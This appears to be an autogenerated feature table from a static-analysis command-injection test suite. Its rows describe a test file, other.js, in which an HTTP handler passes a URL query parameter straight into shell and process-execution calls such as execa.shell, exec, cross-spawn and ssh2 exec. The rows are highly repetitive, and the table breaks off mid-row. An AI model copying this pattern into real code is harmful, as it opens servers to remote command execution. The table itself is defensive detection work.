autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:44 | url.par ... ).query | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:44 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:44 | url.par ... ).query | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:49 | url.par ... ry.path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:49 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:49 | url.par ... ry.path | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:49 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:49 | url.par ... ry.path | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:19:5:23 | parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:19:5:23 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:19:5:23 | parse | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:19:5:23 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:19:5:23 | parse | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:27 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:27 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:27 | req | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:27 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:27 | req | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:31 | req.url | CalleeFlexibleAccessPath | url.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:31 | req.url | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:31 | req.url | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:31 | req.url | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:31 | req.url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:31 | req.url | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:31 | req.url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:31 | req.url | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:25:5:31 | req.url | receiverName | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:29:5:31 | url | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:29:5:31 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:29:5:31 | url | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:29:5:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:29:5:31 | url | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:34:5:37 | true | CalleeFlexibleAccessPath | url.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:34:5:37 | true | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:34:5:37 | true | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:34:5:37 | true | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:34:5:37 | true | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:34:5:37 | true | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:34:5:37 | true | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:34:5:37 | true | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:34:5:37 | true | receiverName | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:40:5:44 | query | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:40:5:44 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:40:5:44 | query | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:40:5:44 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:40:5:44 | query | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:46:5:49 | path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:46:5:49 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:46:5:49 | path | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:46:5:49 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:46:5:49 | path | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:26 | exceptional return of require ... spawn") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:26 | exceptional return of require ... spawn") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:26 | exceptional return of require ... spawn") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:26 | exceptional return of require ... spawn") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:26 | exceptional return of require ... spawn") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:26 | require ... spawn") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:26 | require ... spawn") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:26 | require ... spawn") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:26 | require ... spawn") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:26 | require ... spawn") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:31 | require ... ").sync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:31 | require ... ").sync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:31 | require ... ").sync | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:31 | require ... ").sync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:31 | require ... ").sync | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:36 | exceptional return of require ... nc(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:36 | exceptional return of require ... nc(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:36 | exceptional return of require ... nc(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:36 | exceptional return of require ... nc(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:36 | exceptional return of require ... nc(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:36 | require ... nc(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:36 | require ... nc(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:36 | require ... nc(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:36 | require ... nc(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:36 | require ... nc(cmd) | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:13:7:25 | "cross-spawn" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:13:7:25 | "cross-spawn" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:13:7:25 | "cross-spawn" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:13:7:25 | "cross-spawn" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:13:7:25 | "cross-spawn" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:13:7:25 | "cross-spawn" | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:13:7:25 | "cross-spawn" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:13:7:25 | "cross-spawn" | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:28:7:31 | sync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:28:7:31 | sync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:28:7:31 | sync | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:28:7:31 | sync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:28:7:31 | sync | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:33:7:35 | cmd | CalleeFlexibleAccessPath | import(!).sync | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:33:7:35 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:33:7:35 | cmd | calleeImports | cross-spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:33:7:35 | cmd | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:33:7:35 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:33:7:35 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:33:7:35 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:33:7:35 | cmd | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:11 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:11 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:11 | require | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:11 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:11 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:20 | exceptional return of require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:20 | exceptional return of require("execa") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:20 | exceptional return of require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:20 | exceptional return of require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:20 | exceptional return of require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:20 | require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:20 | require("execa") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:20 | require("execa") | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:20 | require("execa") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:20 | require("execa") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:26 | require ... ).shell | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:26 | require ... ).shell | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:26 | require ... ).shell | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:26 | require ... ).shell | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:26 | require ... ).shell | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:31 | exceptional return of require ... ll(cmd) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:31 | exceptional return of require ... ll(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:31 | exceptional return of require ... ll(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path require cross-spawn sync cmd require execa shell cmd require execa shellSync cmd require execa stdout cmd require execa stderr cmd require execa sync cmd require cross-spawn cmd require cross-spawn-async cmd require exec cmd require exec-async cmd require execa cmd require remote-exec target cmd ssh2 require ssh2 ssh2 exec cmd ssh2 Client exec cmd SSH2Stream require ssh2-streams SSH2Stream SSH2Stream exec false cmd require execa node cmd require foreground-child cmd opener require opener opener http://github.com/ url parse req url true query user opener http://github.com command cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:31 | exceptional return of require ... ll(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| 